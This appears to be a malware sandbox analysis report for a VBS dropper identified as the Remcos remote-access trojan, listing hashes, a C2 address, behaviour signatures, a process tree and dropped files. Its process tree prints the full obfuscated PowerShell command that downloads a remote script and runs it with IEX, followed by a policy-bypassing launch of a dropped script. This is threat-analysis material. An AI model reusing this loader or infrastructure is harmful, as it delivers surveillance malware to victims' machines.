Overview

overview

10

Static

static

Appraisa.vbs

windows7_x64

10

Appraisa.vbs

windows10_x64

10

Property.hta

windows7_x64

10

Property.hta

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    21-04-2021 14:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisa.vbs

  • Size

    662B

  • MD5

    2e95d045ff86903502b52f5fd0976aad

  • SHA1

    c74e479ff249f1e8c248b8a67e318a61b1f1d5e4

  • SHA256

    dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0

  • SHA512

    0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df

Score
10/10
remcosrat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    ed1368a4d6a09fe8b0e905ac7a8b5af5

    SHA1

    faeae903b58190fd505795f71f048199cdef2963

    SHA256

    7223c9ee5c8a0db256550cd8f31e5364b04fa83d82abc0ad0a8a1d2a67bc9c99

    SHA512

    9e25ae219cf4398b3bb156d21b9aaa19ae4c215a9d94ee4e2406b3360415b5fb9945a4d920adfe165a7d59d810ac301ab6f6a6e8b71b886190367176c18a36ba

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    9ff13fe6fddf1299999100e5350227ac

    SHA1

    c591dc9238d5e8442a83a79f2d5b20e3c2b4c19f

    SHA256

    ebd5dfc01e5e7f7e5d493b1cbb4fa21c1b3c0d4c26c67fb103f841ff9053f9ac

    SHA512

    aa64f541501719284e1ef621ff1bb43e8fecd32e887e0e5ecd0bfb6b9bcced369bd0251f5717024875f22a36d69908b9841653f9524cbace088cb21ffe816285

    Download Submit
  • C:\Users\Public\ Microsoft.ps1
    MD5

    eda0264cc0baa7804ce2a32a99aa9b98

    SHA1

    274b4d04e802370cac624649ea30149dded4e053

    SHA256

    950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f

    SHA512

    43f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74

    Download Submit
  • memory/968-87-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/968-86-0x0000000075D11000-0x0000000075D13000-memory.dmp
    Filesize

    8KB

    Download
  • memory/968-85-0x000000000042EEEF-mapping.dmp
    Download
  • memory/968-84-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/1768-60-0x000007FEFC251000-0x000007FEFC253000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1836-71-0x0000000000000000-mapping.dmp
    Download
  • memory/1836-77-0x000000001AEE0000-0x000000001AEE2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1836-78-0x000000001AEE4000-0x000000001AEE6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1836-83-0x0000000002570000-0x0000000002588000-memory.dmp
    Filesize

    96KB

    Download
  • memory/2028-70-0x000000001C6C0000-0x000000001C6C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-69-0x000000001C3B0000-0x000000001C3B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-68-0x00000000024F0000-0x00000000024F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-67-0x0000000002390000-0x0000000002391000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-66-0x000000001AA14000-0x000000001AA16000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2028-65-0x000000001AA10000-0x000000001AA12000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2028-64-0x000000001AA90000-0x000000001AA91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-63-0x00000000024B0000-0x00000000024B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-61-0x0000000000000000-mapping.dmp
    Download